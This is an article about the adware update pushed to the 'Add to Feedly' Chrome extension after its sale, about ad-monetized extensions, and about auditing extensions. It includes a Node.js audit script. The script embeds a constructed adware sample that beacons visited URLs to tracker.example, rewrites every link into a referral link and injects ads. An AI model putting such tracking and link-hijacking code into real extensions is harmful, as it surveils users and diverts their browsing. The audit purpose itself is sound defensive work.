On January 16, Amit Agarwal, the developer of the Add to Feedly extension,
published a blog post admitting that his extension had been sold to an unknown person for several thousand dollars ("a four-digit offer").
Add to Feedly is an extension that added a convenient button for subscribing to the RSS feed of the current page through the Feedly service (a popular replacement for the late Google Reader). Amit wrote the extension in an hour, and it gathered 30,000 users in the Chrome Web Store. The extension was sold, the money was received through PayPal, and Amit
transferred ownership of the extension to another Google account.
A month later, the new owners pushed an update to the Chrome Web Store. No new features, no bug fixes. Only the injection of ads into every page the user views. Every link on every site was rewritten into a referral link, and advertisements were inserted on top of that. In addition, the new owners could now track every page their users visited. Simply put, Chrome's auto-update delivered the malicious code straight into 30,000 browsers, and Chrome Sync then spread it to every connected computer running Google Chrome, Chromium or Chrome OS.
The problem of malicious updates has existed for a long time and is not limited to Chrome. Mozilla Firefox has
had similar scandals. But there is a significant difference: on Mozilla Add-ons, every update is checked manually by reviewers, while the Chrome Web Store assumes that the user already trusts the extension's developer. Moreover, Mozilla's rules require the extension's source code to be submitted for review, unlike the rules of the Chrome Web Store. On top of that, Chrome extensions may already contain compiled Native Client code, which cannot be read the way JavaScript can.
An alternative: honest monetization
You can be sure that Google fights, and will keep fighting, the malicious code submitted to the Chrome Web Store, and that your favourite music grabber will not slip you a phishing page. But the question of advertising remains.
Imagine that a developer decides to make money from his extension. He strikes a deal with an ad network and uploads an update that includes advertising or the collection of (anonymous) statistics. Or he sells the extension and someone else adds the advertising or the statistics collection; to the user the difference hardly matters. What matters is that tomorrow you open your browser and see new advertisements on familiar sites. In Chrome you cannot roll back to the previous version or block the update; you can only disable the familiar extension entirely.
Monetizing extensions through advertising is a safe and legal method that is widely used by developers. We can say with confidence that Google will not ban advertising in extensions: many apps and extensions live on nothing else. But how many links and banners are you willing to put up with for the sake of convenient, familiar functionality?
Reddit users have compiled a
list of extensions that insert advertisements into pages (including replacing a site's own banners with their own), monitor their users (anonymously or explicitly), or simply behave "meanly". Part of the list (for example, Add to Feedly) has already been removed from the Chrome Web Store.
Take the Neat Bookmarks extension as an example. It lets you manage bookmarks conveniently in the browser, with support for accessibility interfaces for the visually impaired and for keyboard control. What interests us is that it ships with affiliate advertising. The advertising is enabled by default, and a separate paragraph on the page that opens after installation tells you so.
In the Neat Bookmarks settings there is also a checkbox to turn the advertising off, but when you try to click it, a page requesting a donation opens. Only there does the user learn that the advertising is turned off only after a donation (of any amount) through PayPal. Thus the user brings revenue to the developers, directly or indirectly, and learns of this only
after installation. If you do not read the post-install pages and do not look at the extension's settings, you will not know about this bundled code until it runs. The income from the extension goes to unknown persons who
bought the extension last year.
There is an open-source, ad-free fork called Neater Bookmarks, but it has far fewer users, which means it ranks
second in search results.
What to do?
You can audit an extension only after installing it, by reading its source code, which means deciphering minified JavaScript files. Often the string literals (where the addresses the code "calls home" to are stored) survive minification unchanged, but sometimes the code is deliberately obfuscated. Extensions that use Native Client (and there will be more of them) require special study and debugging. There are also extensions for Firefox and Chrome that notify you when installed extensions receive new versions.
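What such a post-install audit looks like in practice, as an added example that is not part of the original article. Chrome keeps the unpacked files of every installed extension under the profile directory (Extensions/<id>/<version>/), so the manifest and scripts can be read directly from disk. The script below is a small Node.js audit over a constructed manifest.json and content.js that imitate the behaviour described above (ads on every page, links rewritten to referral links, a beacon reporting every visited URL). Every identifier, and the hosts tracker.example and ref.example, are assumptions made for the illustration, not data from any real extension.

```javascript
// Added example (not from the original article): a static audit of an
// unpacked Chrome extension. The manifest, the content script and the
// hosts tracker.example / ref.example are constructed samples that imitate
// the adware update the article describes; they are not real data.

// Constructed sample manifest.json (Manifest V2, the format of the time).
const sampleManifest = {
  name: "Add to Something",
  version: "1.2",
  manifest_version: 2,
  permissions: ["tabs", "<all_urls>", "storage"],
  content_scripts: [
    { matches: ["<all_urls>"], js: ["content.js"], run_at: "document_end" }
  ]
};

// Constructed sample content.js: beacon the current URL, rewrite every link
// into a referral link, inject an ad iframe. Real adware is usually minified,
// but the string literals holding the hosts normally survive minification.
const sampleFiles = {
  "content.js": `
    var API = "https://tracker.example/visit?u=";
    var REF = "https://ref.example/go?r=";
    var img = new Image(); img.src = API + encodeURIComponent(location.href);
    var links = document.querySelectorAll("a[href]");
    for (var i = 0; i < links.length; i++) {
      links[i].href = REF + encodeURIComponent(links[i].href);
    }
    var ad = document.createElement("iframe");
    ad.src = "https://ref.example/banner";
    document.body.appendChild(ad);
  `
};

// Permissions and match patterns that give an extension every page the user opens.
const BROAD_PERMISSIONS = new Set([
  "<all_urls>", "tabs", "webRequest", "webRequestBlocking", "http://*/*", "https://*/*"
]);

// Behavioural heuristics over the script text: [label, pattern].
const CODE_SIGNALS = [
  ["rewrites link targets",    /\.href\s*=\s*/],
  ["injects iframe or script", /createElement\(\s*["'](iframe|script)["']\s*\)/],
  ["reads current page URL",   /location\.href/]
];

// Absolute http(s) URL literals, de-duplicated, in order of appearance.
function extractUrls(source) {
  const found = source.match(/https?:\/\/[^\s"'<>)]+/g) || [];
  return Array.from(new Set(found));
}

// Returns { findings: [...], hosts: [...] } for one extension.
function auditExtension(manifest, files) {
  const findings = [];
  // 1. Manifest: permissions that reach every page.
  for (const p of manifest.permissions || []) {
    if (BROAD_PERMISSIONS.has(p)) findings.push(`permission ${p}`);
  }
  // 2. Manifest: content scripts that run on every site.
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some(m => BROAD_PERMISSIONS.has(m))) {
      findings.push(`content script on all pages: ${(cs.js || []).join(",")}`);
    }
  }
  // 3. Script bodies: hard-coded hosts and behavioural signals.
  const hosts = new Set();
  for (const [name, source] of Object.entries(files)) {
    for (const url of extractUrls(source)) hosts.add(new URL(url).host);
    for (const [label, re] of CODE_SIGNALS) {
      if (re.test(source)) findings.push(`${name}: ${label}`);
    }
  }
  return { findings, hosts: Array.from(hosts).sort() };
}

// Stand-alone run: report on the constructed sample.
const report = auditExtension(sampleManifest, sampleFiles);
console.log(report.findings.join("\n"));
console.log("contacts hosts:", report.hosts.join(", "));
```

The interesting output is the list of hosts the extension contacts: an "add a button to this page" extension has no business talking to anything but the service it integrates with, so an unfamiliar host in that list is the first thing to look up. The heuristics are deliberately coarse; a bookmark manager that legitimately sets `.href` will trip one of them, and the report is a prompt to read that file, not a verdict.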
People who understand JavaScript can use the Userscripts.org archive as a source of alternative extensions. The scripts on that site pass no filters at all (which means there
is a lot of dangerous code there, and it is assumed that you personally read the code of everything you install), but you can read the code before installing. If you install scripts through the Tampermonkey extension, you can configure auto-update (Tampermonkey warns you about new versions and can ask you before installing them).
Unfortunately, that is all advanced users can do. The Chrome Web Store is tightly coupled to Google Chrome. The auto-update process cannot be disabled (unlike in Mozilla Firefox, where there is an option to update extensions manually). If you install an extension, you trust its developers unconditionally, now and in the future, the current developers and whoever comes after them. If an extension asks for access to your data on habr.ru, you should be prepared to hand over all of your data on habr.ru. With no exceptions.